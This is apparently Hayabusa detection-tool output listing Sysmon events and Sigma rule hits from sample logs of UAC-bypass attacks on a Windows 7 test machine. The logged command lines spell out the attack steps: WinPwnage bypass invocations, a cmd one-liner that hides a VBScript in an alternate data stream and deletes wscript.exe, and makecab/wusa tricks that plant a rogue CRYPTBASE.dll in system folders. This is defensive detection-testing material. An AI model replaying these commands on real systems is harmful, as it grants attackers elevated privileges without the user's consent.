Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.281 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.297 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 
365ABB72-95E5-5CD3-0000-001033750F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.594 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,../hayabusa-rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > 
""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 12:25:24.896 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: 
C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 21:21:57.077 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:02.434 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 22:32:48.200 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:48.412 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:58.549 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 
+09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:49:29.586 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:29.789 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:29.789 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:34.946 +09:00,IEWIN7,11,info,,File Created,Path: 
C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:39.930 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:40.164 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.133 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.378 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 18:50:08.248 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:08.491 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:08.491 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.494 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 
365ABB72-9AD5-5CD6-0000-0010C4131700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.509 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.404 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 365ABB72-9ADA-5CD6-0000-001012231700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.654 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:26.779 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | 
PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.018 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.030 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-12 01:46:10.125 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:10.344 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: 
c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:10.344 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.547 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.828 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:26.203 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:54:02.071 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:02.305 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 
365ABB72-FE2A-5CD6-0000-00107E091700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:02.305 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.508 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.524 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.493 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 